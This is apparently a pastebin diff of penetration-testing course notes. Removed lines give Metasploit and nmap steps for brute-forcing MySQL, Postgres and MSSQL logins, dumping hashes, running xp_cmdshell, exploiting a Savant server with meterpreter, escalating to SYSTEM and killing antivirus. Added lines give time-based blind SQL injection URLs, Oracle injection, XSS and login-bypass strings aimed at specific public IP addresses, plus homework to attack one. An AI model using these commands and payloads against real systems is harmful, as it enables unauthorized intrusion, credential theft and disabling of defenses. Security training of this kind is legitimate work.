861	+
862		###############################
863	-	./msfconsole
863	+
864		###############################
865	-	use auxiliary/scanner/mysql/mysql_version
865	+
866	-	set RHOSTS 10.0.0.59
866	+
867	-	run
867	+
868		http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
869	-	use auxiliary/scanner/mysql/mysql_login
869	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
870	-	set RHOSTS 10.0.0.59
870	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
871	-	set USER_FILE /home/infosecaddicts/toolz/wordlists/users.txt
871	+
872	-	set PASS_FILE /home/infosecaddicts/toolz/wordlists/pass.txt
872	+
873	-	run
873	+	http://54.213.252.28/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
874
875	-	use auxiliary/admin/mysql/mysql_enum
875	+
876	-	set RHOST 10.0.0.59
876	+
877	-	set USERNAME root
877	+
878	-	run
878	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
879		http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
880	-	use auxiliary/scanner/mysql/mysql_hashdump
880	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
881	-	set RHOSTS 10.0.0.59
881	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
882	-	set USERNAME root
882	+
883	-	run
883	+
884		http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
885	-	exit -y
885	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
886
887		O - 3rd Character
888	-	$ mysql -h 10.0.0.59 -u root -p
888	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
889	-	show databases;
889	+	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
890		http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
891		http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
892		http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
893		http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
894		http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
895	-	Attacking Postgres with Metasploit
895	+
896	-	----------------------------------
896	+
897	-	cd ~/toolz/metasploit
897	+
898
899	-	./msfconsole
899	+	********************** Class Homework **********************
900
901	-	use auxiliary/scanner/postgres/postgres_login
901	+	Perform a mock penetration test against http://54.172.112.249 using what you have learned in this pastebin.
902	-	set RHOSTS 10.0.0.59
902	+
903	-	run
903	+	You don't need to document it for me, but go through the steps for your own understanding.
904
905
906
907
908	-	Identifying MSSQL Server
908	+
909	-	-----------------------
909	+
910
911	-	propecia 10.0.0 1433
911	+
912
913		Here are some sample web app penetration test reports from other companies that you can look at:
914		https://s3.amazonaws.com/StrategicSec-Files/WebAppSampleReports.zip
915
916	-	Determine the Version
916	+
917	-	---------------------
917	+
918
919	-	nmap -sV -p 1433 10.0.0.9
919	+
920	-	nmap -sV -p 1433 --script=ms-sql-info 10.0.0.9
920	+
921
922
923
924	-	Bruteforcing MSSQL
924	+
925	-	------------------
925	+
926		###############################################################
927	-	nmap -p1433 --script ms-sql-empty-password 10.0.0.9
927	+
928		Step 1: Automated Testing
929
930	-	mkdir ~/toolz/wordlists
930	+
931	-	cd ~/toolz/wordlists
931	+
932	-	echo dbo >> customuser.txt
932	+
933	-	echo sa >> customuser.txt
933	+
934	-	echo admin >> customuser.txt
934	+
935	-	echo password >> custompass.txt
935	+
936	-	echo pass >> custompass.txt
936	+
937	-	echo hello >> custompass.txt
937	+
938	-	echo goodbye >> custompass.txt
938	+
939	-	echo test >> custompass.txt
939	+
940	-	echo admin >> custompass.txt
940	+
941	-	echo db >> custompass.txt
941	+
942	-	echo god >> custompass.txt
942	+
943	-	echo 123 >> custompass.txt
943	+
944	-	echo letmein >> custompass.txt
944	+
945	-	echo database!23 >> custompass.txt
945	+
946
947		Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.
948
949
950	-	nmap -sV -p 1433 --script=ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 10.0.0.9
950	+
951
952
953
954	-	Extracting Data From MSSQL
954	+
955		-------------------------------
956	-	nmap -sV -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=database\!23 10.0.0.9
956	+
957
958	-	nmap -p1433 --script ms-sql-hasdbaccess.nse --script-args mssql.username=sa,mssql.password=database\!23 10.0.0.9
958	+
959
960	-	nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=database\!23 10.0.0.9
960	+
961
962	-	nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=database\!23 10.0.0.9
962	+
963
964	-	nmap -p1433 --script ms-sql-xp-cmdshell --script-args=ms-sql-xp-cmdshell.cmd='net users',mssql.username=sa,mssql.password=database\!23 10.0.0.9
964	+
965		Save the spider and scan results. I usually provide this data to the customer as well.
966	-	nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=database\!23 10.0.0.9
966	+
967
968		Step 2b: Browse through the site using the 3 question method
969		Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
970
971		Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
972
973	-	Attacking MSSQL Server With Metasploit
973	+
974	-	--------------------------------------
974	+
975	-	cd ~/toolz/metasploit
975	+
976		When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:
977	-	./msfconsole
977	+
978		http://www.site.com/page.aspx?parametername=[ payload ]
979	-	use auxiliary/admin/mssql/mssql_sql
979	+
980		You need to ensure that you send the payload this way, and like this below:
981	-	show options
981	+
982		http://www.site.com/page.aspx?parametername=parametervalue[ payload ]
983	-	set RHOST 10.0.0.9
983	+
984		This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.
985	-	set username sa
985	+
986
987	-	set password database!23
987	+
988
989	-	exploit
989	+
990
991
992		###########################################
993		# Question 2: How much fuzzing is enough? #
994		###########################################
995		There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
996
997		Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
998
999	-	use auxiliary/admin/mssql/mssql_enum
999	+
1000		Step 1: Ask yourself the 3 questions per page of the site.
1001	-	show options
1001	+
1002		Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
1003	-	set RHOST 10.0.0.9
1003	+
1004		Step 3: When you load your fuzz strings - use the following decision tree
1005	-	set username sa
1005	+
1006		- Are the fuzz strings causing a default error message (example 404)?
1007	-	set password database!23
1007	+	- If this is the case then it is most likely NOT vulnerable
1008
1009	-	exploit
1009	+	- Are the fuzz strings causing a WAF or LB custom error message?
1010		- If this is the case then you need to find an encoding method to bypass
1011
1012
1013		- Are the fuzz strings causing an error message that discloses the backend type?
1014		- If yes, then identify DB type and find correct syntax to successfully exploit
1015	-	use auxiliary/admin/mssql/mssql_exec
1015	+	- Some example strings that I use are:
1016		'
1017	-	show options
1017	+	"
1018		() <----- Take the parameter value and put it in parenthesis
1019	-	set RHOST 10.0.0.9
1019	+	(5-1) <----- See if you can perform an arithmetic function
1020
1021	-	set password database!23
1021	+
1022		- Are the fuzz strings rendering executable code?
1023	-	set CMD cmd.exe /c ping localhost
1023	+	- If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
1024		- Some example strings that I use are:
1025	-	exploit
1025	+	<b>hello</b>
1026		<u>hello</u>
1027		<script>alert(123);</script>
1028		<script>alert(xss);</script>
1029		<script>alert('xss');</script>
1030		<script>alert("xss");</script>
1031
1032	-	################################
1032	+
1033	-	# Attacking Big Data Solutions #
1033	+
1034	-	################################
1034	+
1035
1036	-	propecia 10.0.0 27017
1036	+
1037
1038		-------------------------------------------------------------------------------------------
1039	-	sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24
1039	+
1040	-	infosecaddicts
1040	+
1041		# Trading Web App with WAF #
1042		# http://54.213.131.105 #
1043		############################
1044
1045	-	Big Data is quite the buzzword in our industry and MongoDB is one of the more popular Big Data solutions on the market.
1045	+
1046	-	There are others like CouchDB, and Cassandra, but for right now let's play with MongoDB.
1046	+
1047		<script>alert(123);</script>
1048	-	One of the huge red flags with MongoDB is that its default configuration it has no user authentication, and no permissions.
1048	+
1049		<script>alert(123)
1050		<script>alert
1051		<script>
1052	-	sudo apt install -y git python-setuptools
1052	+
1053		<scrip
1054	-	cd ~/toolz
1054	+
1055		<scr
1056	-	mkdir arsenal
1056	+
1057		<s
1058	-	cd arsenal
1058	+
1059		<
1060	-	git clone https://github.com/tcstool/nosqlmap.git
1060	+
1061		Joe'+OR+1=1;--
1062	-	cd nosqlmap
1062	+
1063
1064	-	sudo python setup.py install
1064	+
1065	-	infosecaddicts
1065	+	http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName
1066
1067	-	python nosqlmap.py
1067	+
1068		xss_upload.txt (Upload Bulk Order)
1069	-	1 (set options)
1069	+
1070	-	10.0.0.59 (set target IP)
1070	+
1071
1072		Login Box:
1073	-	7 <your IP> (set attacker host ip)
1073	+
1074		' or 1=1 or ''='
1075		anything
1076	-	x (back to main menu)
1076	+
1077
1078	-	2 (DB access attack option)
1078	+
1079		Tamper Data: (notice 2 session IDs)
1080
1081	-	1 (Get server info)
1081	+
1082		IsAdmin=yes;
1083		ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
1084	-	2 (Enumerate Databases/Collections/Users)
1084	+
1085
1086
1087	-	3 (Check for GridFS)
1087	+
1088	-	GridFS is a specification for storing and retrieving files that exceed the BSON-document size limit of 16MB. Instead of storing a file in a single document, GridFS divides a file into parts, or chunks [1], and stores each chunk as a separate document
1088	+
1089		joe\|set
1090
1091
1092
1093
1094	-	Other attack options such as clone a database will require you to have a local copy of MongoDB installed, and the Metasploit attack is for too old of a version ( < 2.2.4 ).
1094	+
1095
1096
1097		###########################################################
1098		# Attacking an Oracle/JSP based WebApp with SQL Injection #
1099		###########################################################
1100
1101	-	####################################
1101	+
1102	-	# Finally, let's exploit something #
1102	+
1103	-	####################################
1103	+
1104
1105	-	nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* \| awk '/open/{print $2}'
1105	+	http://54.69.156.253:8081/bookcompany/
1106
1107	-	nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15
1107	+
1108		user: a' OR 'a'='a
1109	-	https://www.exploit-db.com/search
1109	+
1110
1111	-	Search for:
1111	+
1112	-	Savant httpd 3.1
1112	+
1113	-	Apache httpd 2.0.58 ((Win32))
1113	+
1114
1115
1116	-	Found one written in Python:
1116	+
1117	-	https://www.exploit-db.com/exploits/18401/
1117	+	http://54.69.156.253:8081/bookcompany/author.jsp?id=111
1118
1119	-	Found one for Savant 3.1 from Metasploit:
1119	+
1120	-	https://www.exploit-db.com/exploits/16770/
1120	+
1121
1122
1123
1124	-	cd ~/toolz/metasploit
1124	+
1125	-	./msfconsole
1125	+
1126	-	use exploit/windows/http/savant_31_overflow
1126	+
1127	-	set RHOST 10.0.0.15
1127	+
1128	-	set PAYLOAD windows/meterpreter/bind_nonx_tcp
1128	+
1129	-	set RPORT 80
1129	+
1130	-	set LPORT 7777
1130	+
1131	-	exploit
1131	+
1132
1133		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1
1134
1135
1136
1137		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' OR '1'='1
1138	-	******************************** Figure out who and where you are ********************************
1138	+
1139
1140	-	meterpreter> sysinfo
1140	+
1141
1142
1143	-	meterpreter> getuid
1143	+
1144
1145
1146	-	meterpreter> ipconfig
1146	+
1147
1148
1149	-	meterpreter> run post/windows/gather/checkvm
1149	+
1150
1151
1152	-	meterpreter> run get_local_subnets
1152	+
1153		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
1154
1155
1156	-	******************************** Escalate privileges and get hashes ********************************
1156	+
1157
1158
1159	-	meterpreter> use priv
1159	+
1160
1161
1162		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT user FROM dual))--
1163	-	meterpreter > getsystem
1163	+
1164	-	...got system (via technique 1).
1164	+
1165
1166	-	meterpreter > getuid
1166	+
1167	-	Server username: NT AUTHORITY\SYSTEM
1167	+
1168
1169	-	--------------------------------------------------------
1169	+
1170		http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name))--
1171	-	meterpreter> run killav
1171	+
1172		Current database is:

Public Pastes

🤑 G2A.com Free Gift Card Guide May 2024 FIX 🤑
GetText | 6 min ago | 0.39 KB
Жизнь прижок скорость
Lua | 9 min ago | 4.00 KB
Roman2Integer x2
Java | 12 min ago | 1.50 KB
ЛР2 ООП
C++ | 17 min ago | 3.58 KB
le sigh
JavaScript | 22 min ago | 12.63 KB
auto Backward Elim
R | 28 min ago | 0.51 KB
Untitled
SQL | 48 min ago | 1.71 KB
weapon_script
GDScript | 57 min ago | 16.67 KB